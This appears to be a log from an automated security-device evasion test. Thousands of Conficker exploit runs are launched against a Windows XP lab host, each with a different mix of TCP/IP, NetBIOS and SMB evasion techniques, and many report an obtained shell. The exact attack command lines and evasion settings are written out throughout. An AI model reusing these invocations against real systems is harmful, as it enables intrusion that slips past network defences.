Info: Using random seed IXFVjUV0NBU
The following evasions are applied from stage start to smb_opentree:
- With every 2 TCP packet a TCP chaff packet is sent. The chaff packet has:
* NULL TCP control flags.
* An out-of-window sequence number.
* TCP header longer than packet total size
* Duplicate packet has 30 bytes of original payload, then shuffled original payload
The following evasions are applied from stage netbios_connect to msrpc_bind:
- TCP timestamps echo reply value is sent in the wrong endianness
The following evasions are applied from stage smb_openpipe to end:
- Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 2> and has random alpha bytes as payload

Info: NetBIOS connection 10.62.90.118:38134 -> 10.35.1.207:445
Terminated
........
5363 runs averaging 1.95 runs / second ; progress: 2746/43200.....
5368 runs averaging 1.95 runs / second ; progress: 2751/43200.........
5377 runs averaging 1.95 runs / second ; progress: 2756/43200........Pid 5835 timed out - killed
2015-06-08 00:05:28 INFO
Timed out (10.62.90.114):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=60575 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=gdbOuPqrGXQ --evasion=[msrpc_req,end]smb_decoytrees,"1","6","2","zero" --evasion=[msrpc_req,end]tcp_urgent,"2","random_alphanum" --verifydelay=1000 --payload=shell
Info: Using random seed gdbOuPqrGXS
The following evasions are applied from stage msrpc_req to end:
- Add a random alphanumeric urgent data byte to every 2 TCP segment.
- Before normal SMB writes, 1 SMB trees are opened and 6 writes are performed to them. The write payload is 2 bytes of zeroes.

Info: NetBIOS connection 10.62.90.114:60575 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Terminated
..............
5400 runs averaging 1.96 runs / second ; progress: 2761/43200.................
5417 runs averaging 1.96 runs / second ; progress: 2766/43200..........2015-06-08 00:05:39 INFO
Success. (10.62.90.117):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=33189 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=L4awF43Jyu8 --evasion=[netbios_connect,smb_opentree]tcp_chaff,"2","nullflag|outofwindow|shorthdr|longhdr","alphanumrandomized" --evasion=[msrpc_bind,end]tcp_paws,"1","268435453","random" --verifydelay=1000 --payload=shell
Info: Using random seed L4awF43Jyu8
The following evasions are applied from stage netbios_connect to smb_opentree:
- With every 2 TCP packet a TCP chaff packet is sent. The chaff packet has:
* NULL TCP control flags.
* An out-of-window sequence number.
* TCP header shorter than 20 bytes
* TCP header longer than packet total size
* Duplicate packet has original payload with alphanumeric bytes randomized
The following evasions are applied from stage msrpc_bind to end:
- Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has random bytes as payload

Info: NetBIOS connection 10.62.90.117:33189 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
.....
5433 runs averaging 1.96 runs / second ; progress: 2771/43200...Pid 6275 timed out - killed
.2015-06-08 00:05:44 INFO
Timed out (10.62.90.110):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=18545 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=9j13UKNIujo --evasion=[smb_connect,smb_openpipe]tcp_tsoptreply,"le" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"25%","zero" --verifydelay=1000 --payload=shell
Info: Using random seed 9j13UKNIujr
The following evasions are applied from stage smb_connect to smb_openpipe:
- TCP timestamps echo reply value is sent in the wrong endianness
The following evasions are applied from stage smb_opentree to msrpc_req:
- 25% probability to add a zero urgent data byte to a TCP segment.

Info: NetBIOS connection 10.62.90.110:18545 -> 10.35.1.207:445
Terminated
....
5442 runs averaging 1.96 runs / second ; progress: 2776/43200............
5454 runs averaging 1.96 runs / second ; progress: 2781/43200..............................
5484 runs averaging 1.97 runs / second ; progress: 2786/43200......2015-06-08 00:05:57 INFO
Success. (10.62.90.117):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=38094 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=Ob4ff1j+QiM --evasion=[msrpc_req,end]netbios_chaff,"13","empty_unspec|http_post|broken_length" --evasion=[smb_connect,msrpc_req]tcp_paws,"1","268435455","alphanumrandomized" --verifydelay=1000 --payload=shell
Info: Using random seed Ob4ff1j+QiM
The following evasions are applied from stage smb_connect to msrpc_req:
- Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has original payload with alphanumeric bytes randomized
The following evasions are applied from stage msrpc_req to end:
- Before every 13th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.

Info: NetBIOS connection 10.62.90.117:38094 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Command shell connection reset.
Info: CommandShell::SendCommand() - Failed to send string
Info: Shell closed
0: Success.
.........2015-06-08 00:05:59 INFO
Success. (10.62.90.119):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=41416 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=W6ooJoo6NGg --evasion=[smb_opentree,msrpc_bind]smb_chaff,"3","write_flag","rand" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"2","4","shuffle30" --verifydelay=1000 --payload=shell
Info: Using random seed W6ooJoo6NGh
The following evasions are applied from stage smb_opentree to msrpc_bind:
- Before every 3th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random payload
The following evasions are applied from stage smb_openpipe to msrpc_req:
- Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has 30 bytes of original payload, then shuffled original payload

Info: NetBIOS connection 10.62.90.119:41416 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
...........2015-06-08 00:06:01 INFO
Success. (10.62.90.116):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=37607 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=dEFeq3VZExs --evasion=[smb_connect,msrpc_bind]ipv4_frag,"1480" --evasion=[smb_openpipe,end]tcp_paws,"75%","86788071","zero" --verifydelay=1000 --payload=shell
Info: Using random seed dEFeq3VZExt
The following evasions are applied from stage smb_connect to msrpc_bind:
- IPv4 fragments with at most 1480 bytes per fragment
The following evasions are applied from stage smb_openpipe to end:
- 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 86788071> and has 0x00 bytes as payload

Info: NetBIOS connection 10.62.90.116:37607 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
.....
5518 runs averaging 1.98 runs / second ; progress: 2791/43200..2015-06-08 00:06:02 INFO
Success. (10.62.90.116):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=59212 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=KcAUp61efmk --evasion=[smb_opentree,end]tcp_chaff,"25%","longhdr","alphanumrandomized" --evasion=[netbios_connect,msrpc_req]tcp_paws,"75%","9","alpharandomized" --verifydelay=1000 --payload=shell
Info: Using random seed KcAUp61efmk
The following evasions are applied from stage netbios_connect to msrpc_req:
- 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has original payload with alphabetic bytes randomized
The following evasions are applied from stage smb_opentree to end:
- 25% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
* TCP header longer than packet total size
* Duplicate packet has original payload with alphanumeric bytes randomized

Info: NetBIOS connection 10.62.90.116:59212 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: CommandShell::SendCommand() - Failed to send string
Info: Command shell connection reset.
Info: Shell closed
0: Success.
...........................
5548 runs averaging 1.98 runs / second ; progress: 2796/43200...........
5559 runs averaging 1.98 runs / second ; progress: 2802/43200..............
5573 runs averaging 1.99 runs / second ; progress: 2807/43200.2015-06-08 00:06:17 INFO
Success. (10.62.90.118):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=16184 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=hDX3Ay+q5YA --evasion=[start,msrpc_req]tcp_chaff,"25%","chksum|nullflag|shorthdr","shuffle30" --evasion=[smb_openpipe,end]tcp_paws,"25%","133338995","zero" --verifydelay=1000 --payload=shell
Info: Using random seed hDX3Ay+q5YC
The following evasions are applied from stage start to msrpc_req:
- 25% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
* Invalid TCP checksum.
* NULL TCP control flags.
* TCP header shorter than 20 bytes
* Duplicate packet has 30 bytes of original payload, then shuffled original payload
The following evasions are applied from stage smb_openpipe to end:
- 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 133338995> and has 0x00 bytes as payload

Info: NetBIOS connection 10.62.90.118:16184 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: CommandShell::SendCommand() - Failed to send string
Info: Command shell connection reset.
Info: Shell closed
0: Success.
..............
5589 runs averaging 1.99 runs / second ; progress: 2812/43200..................
5607 runs averaging 1.99 runs / second ; progress: 2817/43200...................
5626 runs averaging 1.99 runs / second ; progress: 2822/43200..............
5640 runs averaging 2.00 runs / second ; progress: 2827/43200.......2015-06-08 00:06:40 INFO
Success. (10.62.90.116):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55004 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=HTMWhpt4lOI --evasion=[msrpc_bind,end]smb_decoytrees,"5","3","2","random_msrpcbind" --evasion=[msrpc_bind,end]tcp_tsoptreply,"le" --evasion=[netbios_connect,smb_connect]tcp_urgent,"50%","random" --verifydelay=1000 --payload=shell
Info: Using random seed HTMWhpt4lOI
The following evasions are applied from stage netbios_connect to smb_connect:
- 50% probability to add a random urgent data byte to a TCP segment.
The following evasions are applied from stage msrpc_bind to end:
- TCP timestamps echo reply value is sent in the wrong endianness
- Before normal SMB writes, 5 SMB trees are opened and 3 writes are performed to them. The write payload is 2 bytes of MSRPC bind-like data.

Info: NetBIOS connection 10.62.90.116:55004 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
...
5651 runs averaging 2.00 runs / second ; progress: 2832/43200.............
5664 runs averaging 2.00 runs / second ; progress: 2837/43200...............
5679 runs averaging 2.00 runs / second ; progress: 2842/43200..........
5689 runs averaging 2.00 runs / second ; progress: 2847/43200.....
5694 runs averaging 2.00 runs / second ; progress: 2852/43200............
5706 runs averaging 2.00 runs / second ; progress: 2857/43200..........Pid 8518 timed out - killed
2015-06-08 00:07:11 INFO
Timed out (10.62.90.112):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=28446 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=F6sYh44LGYY --evasion=[start,smb_connect]ipv4_opt,"21","inc","shuffletcp" --evasion=[smb_connect,msrpc_bind]tcp_urgent,"25%","random_alphanum" --verifydelay=1000 --payload=shell
Info: Using random seed F6sYh44LGYY
The following evasions are applied from stage start to smb_connect:
- Every 21th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
The duplicate packet has shuffled TCP payload
The following evasions are applied from stage smb_connect to msrpc_bind:
- 25% probability to add a random alphanumeric urgent data byte to a TCP segment.

Info: NetBIOS connection 10.62.90.112:28446 -> 10.35.1.207:445
Terminated
2015-06-08 00:07:11 INFO
Success. (10.62.90.118):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=46988 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=Sv3aj7zFtLI --evasion=[netbios_connect,msrpc_req]netbios_chaff,"8","small_unspec" --evasion=[netbios_connect,msrpc_req]tcp_paws,"75%","52269486","random_alphanum" --evasion=[msrpc_bind,end]tcp_paws,"25%","205278740","random_alphanum" --verifydelay=1000 --payload=shell
Info: Using random seed Sv3aj7zFtLJ
The following evasions are applied from stage netbios_connect to msrpc_req:
- 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 52269486> and has random alphanumeric bytes as payload
- Before every 8th actual NetBIOS message a chaff message is sent. The chaff message is a small NetBIOS message of an unspecified type.
The following evasions are applied from stage msrpc_bind to end:
- 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 205278740> and has random alphanumeric bytes as payload

Info: NetBIOS connection 10.62.90.118:46988 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Command shell connection reset.
Info: CommandShell::SendCommand() - Failed to send string
Info: Shell closed
0: Success.
....
5722 runs averaging 2.00 runs / second ; progress: 2862/43200...................
5741 runs averaging 2.00 runs / second ; progress: 2867/43200.................
5758 runs averaging 2.00 runs / second ; progress: 2872/43200............
5770 runs averaging 2.01 runs / second ; progress: 2877/43200..........
5780 runs averaging 2.01 runs / second ; progress: 2882/43200..................
5798 runs averaging 2.01 runs / second ; progress: 2887/43200...................2015-06-08 00:07:41 INFO
Success. (10.62.90.116):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=65225 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=b+LULLXLP9A --evasion=[smb_opentree,smb_openpipe]smb_decoytrees,"7","4","1645","random_msrpcbind" --evasion=[smb_openpipe,end]tcp_paws,"75%","9","zero" --verifydelay=1000 --payload=shell
Info: Using random seed b+LULLXLP9B
The following evasions are applied from stage smb_opentree to smb_openpipe:
- Before normal SMB writes, 7 SMB trees are opened and 4 writes are performed to them. The write payload is 1645 bytes of MSRPC bind-like data.
The following evasions are applied from stage smb_openpipe to end:
- 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has 0x00 bytes as payload

Info: NetBIOS connection 10.62.90.116:65225 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
....
5822 runs averaging 2.01 runs / second ; progress: 2892/432002015-06-08 00:07:42 INFO
Success. (10.62.90.116):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=14977 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=/6AH03N7Zfg --evasion=[smb_connect,end]tcp_paws,"50%","108770038","alphanumrandomized" --evasion=[msrpc_req,end]tcp_segvar,"7","30328" --verifydelay=1000 --payload=shell
Info: Using random seed /6AH03N7Zfj
The following evasions are applied from stage smb_connect to end:
- 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 108770038> and has original payload with alphanumeric bytes randomized
The following evasions are applied from stage msrpc_req to end:
- TCP packets are segmented to contain between 7 and 30328 bytes of payload.

Info: NetBIOS connection 10.62.90.116:14977 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: CommandShell::SendCommand() - Failed to send string
Info: Command shell connection reset.
Info: Shell closed
0: Success.
.................
5840 runs averaging 2.02 runs / second ; progress: 2897/43200..................
5858 runs averaging 2.02 runs / second ; progress: 2902/43200.................
5875 runs averaging 2.02 runs / second ; progress: 2907/43200...............2015-06-08 00:08:00 INFO
Success. (10.62.90.115):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=51948 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=fl6e6aGm5+U --evasion=[smb_opentree,end]netbios_chaff,"13","empty_unspec|empty_keepalive|msrpc_req" --evasion=[msrpc_bind,msrpc_req]tcp_paws,"75%","92936105","random_alphanum" --verifydelay=1000 --payload=shell
Info: Using random seed fl6e6aGm5+V
The following evasions are applied from stage smb_opentree to end:
- Before every 13th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is an unspecified NetBIOS message with MSRPC request like payload.
The following evasions are applied from stage msrpc_bind to msrpc_req:
- 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 92936105> and has random alphanumeric bytes as payload

Info: NetBIOS connection 10.62.90.115:51948 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Command shell connection reset.
Info: CommandShell::SendCommand() - Failed to send string
Info: Shell closed
0: Success.
.......
5898 runs averaging 2.03 runs / second ; progress: 2912/432002015-06-08 00:08:03 INFO
Success. (10.62.90.112):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=46316 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=WPmLbVV+KN8 --evasion=[smb_openpipe,msrpc_bind]smb_fnameobf,"change_case|add_paths|add_null_trailer" --evasion=[start,end]tcp_paws,"25%","248594867","random_alphanum" --evasion=[netbios_connect,smb_opentree]tcp_paws,"2","140365635","alpharandomized" --verifydelay=1000 --payload=shell
Info: Using random seed WPmLbVV+KN9
- 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 248594867> and has random alphanumeric bytes as payload
The following evasions are applied from stage netbios_connect to smb_opentree:
- Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 140365635> and has original payload with alphabetic bytes randomized
The following evasions are applied from stage smb_openpipe to msrpc_bind:
- The SMB filename is obfuscated:
* Random characters case is changed
* Dummy paths are added ( a/b -> a/c/../b )
* A 0x00 and random alphanumeric characters are appended to the filename

Info: NetBIOS connection 10.62.90.112:46316 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: CommandShell::SendCommand() - Failed to send string
Info: Command shell connection reset.
Info: Shell closed
0: Success.
..........Pid 9568 timed out - killed
2015-06-08 00:08:07 INFO
Timed out (10.62.90.113):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=20559 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=Lu/W+J+ia8E --evasion=[netbios_connect,smb_connect]tcp_urgent,"5","zero" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"2","random" --verifydelay=1000 --payload=shell
Info: Using random seed Lu/W+J+ia8E
The following evasions are applied from stage netbios_connect to smb_connect:
- Add a zero urgent data byte to every 5 TCP segment.
The following evasions are applied from stage smb_opentree to msrpc_req:
- Add a random urgent data byte to every 2 TCP segment.

Info: NetBIOS connection 10.62.90.113:20559 -> 10.35.1.207:445
Terminated

5910 runs averaging 2.03 runs / second ; progress: 2917/43200........2015-06-08 00:08:10 INFO
Success. (10.62.90.112):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=26515 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=dmrBvWj+KHs --evasion=[start,msrpc_req]ipv4_opt,"21","inc","unmodified" --evasion=[smb_openpipe,msrpc_req]smb_chaff,"21","write_flag","rand" --evasion=[smb_opentree,msrpc_req]tcp_paws,"75%","161045439","shuffle" --verifydelay=1000 --payload=shell
Info: Using random seed dmrBvWj+KHt
The following evasions are applied from stage start to msrpc_req:
- Every 21th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
The duplicate packet has identical payload
The following evasions are applied from stage smb_opentree to msrpc_req:
- 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 161045439> and has shuffled original payload
The following evasions are applied from stage smb_openpipe to msrpc_req:
- Before every 21th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random payload

Info: NetBIOS connection 10.62.90.112:26515 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
......
5925 runs averaging 2.03 runs / second ; progress: 2922/43200.2015-06-08 00:08:13 INFO
Success. (10.62.90.112):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=29584 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=tYONh/AvK4Y --evasion=[smb_opentree,smb_openpipe]smb_chaff,"8","write_flag","msrpc" --evasion=[smb_connect,end]tcp_paws,"1","268435455","random_alpha" --evasion=[netbios_connect,end]tcp_recv_window,"1048575" --verifydelay=1000 --payload=shell
Info: Using random seed tYONh/AvK4a
The following evasions are applied from stage netbios_connect to end:
- TCP receive window is set to at most 1048575 bytes.
The following evasions are applied from stage smb_connect to end:
- Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has random alpha bytes as payload
The following evasions are applied from stage smb_opentree to smb_openpipe:
- Before every 8th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload

Info: NetBIOS connection 10.62.90.112:29584 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Command shell connection reset.
Info: CommandShell::SendCommand() - Failed to send string
Info: Shell closed
0: Success.
.....................
5948 runs averaging 2.03 runs / second ; progress: 2928/43200............2015-06-08 00:08:22 INFO
Success. (10.62.90.116):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=26011 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=jfv1oCGsfoE --evasion=[msrpc_bind,end]tcp_paws,"50%","8","random_alpha" --evasion=[netbios_connect,smb_connect]tcp_segvar,"5","65534" --verifydelay=1000 --payload=shell
Info: Using random seed jfv1oCGsfoG
The following evasions are applied from stage netbios_connect to smb_connect:
- TCP packets are segmented to contain between 5 and 65534 bytes of payload.
The following evasions are applied from stage msrpc_bind to end:
- 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has random alpha bytes as payload

Info: NetBIOS connection 10.62.90.116:26011 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
...
5964 runs averaging 2.03 runs / second ; progress: 2933/43200................
5980 runs averaging 2.04 runs / second ; progress: 2938/432002015-06-08 00:08:28 INFO
Success. (10.62.90.116):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=53136 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=KkbNMAGYqPk --evasion=[msrpc_bind,msrpc_req]tcp_overlap,"4","new","random_alpha" --evasion=[msrpc_bind,msrpc_req]tcp_paws,"1","268435453","alpharandomized" --verifydelay=1000 --payload=shell
Info: Using random seed KkbNMAGYqPk
The following evasions are applied from stage msrpc_bind to msrpc_req:
- Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has original payload with alphabetic bytes randomized
- TCP segments are set to overlap by 4 bytes, with the later packet containing the correct payload. Overlapping part has random alpha bytes as payload

Info: NetBIOS connection 10.62.90.116:53136 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: CommandShell::SendCommand() - Failed to send string
Info: Command shell connection reset.
Info: Shell closed
0: Success.
..................
5999 runs averaging 2.04 runs / second ; progress: 2943/43200..2015-06-08 00:08:33 INFO
Success. (10.62.90.112):
  3422. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=62808 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=Y9jHGKPdrkQ --evasion=[msrpc_req,end]smb_writeandxpad,"8","zero" --evasion=[netbios_connect,end]tcp_paws,"1","268435454","random_alpha" --verifydelay=1000 --payload=shell
  3423. Info: Using random seed Y9jHGKPdrkR
  3424. The following evasions are applied from stage netbios_connect to end:
  3425. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has random alpha bytes as payload
  3426. The following evasions are applied from stage msrpc_req to end:
  3427. - 8 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of zero bytes.
  3428.  
  3429. Info: NetBIOS connection 10.62.90.112:62808 -> 10.35.1.207:445
  3430. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3431. Info: Sending MSRPC request with exploit
  3432. Info: Shell found, attack succeeded
  3433. Info: Shell closed
  3434. 0: Success.
  3435. .................................
  3436. 6035 runs averaging 2.05 runs / second ; progress: 2948/43200....................
  3437. 6055 runs averaging 2.05 runs / second ; progress: 2953/43200........2015-06-08 00:08:45 INFO
  3438. Success. (10.62.90.118):
  3439. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=47868 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=xqepctN8ai8 --evasion=[netbios_connect,msrpc_bind]ipv4_frag,"72" --evasion=[smb_opentree,msrpc_req]smb_decoytrees,"7","6","3","random_msrpcbind" --verifydelay=1000 --payload=shell
  3440. Info: Using random seed xqepctN8ai/
  3441. The following evasions are applied from stage netbios_connect to msrpc_bind:
  3442. - IPv4 fragments with at most 72 bytes per fragment
  3443. The following evasions are applied from stage smb_opentree to msrpc_req:
  3444. - Before normal SMB writes, 7 SMB trees are opened and 6 writes are performed to them. The write payload is 3 bytes of MSRPC bind-like data.
  3445.  
  3446. Info: NetBIOS connection 10.62.90.118:47868 -> 10.35.1.207:445
  3447. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3448. Info: Sending MSRPC request with exploit
  3449. Info: Shell found, attack succeeded
  3450. Info: Shell closed
  3451. 0: Success.
  3452. ....2015-06-08 00:08:46 INFO
  3453. Success. (10.62.90.113):
  3454. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=33860 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=Ln/5ZlyjG9A --evasion=[smb_opentree,end]smb_decoytrees,"4","6","2","random_msrpcbind" --evasion=[netbios_connect,smb_openpipe]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
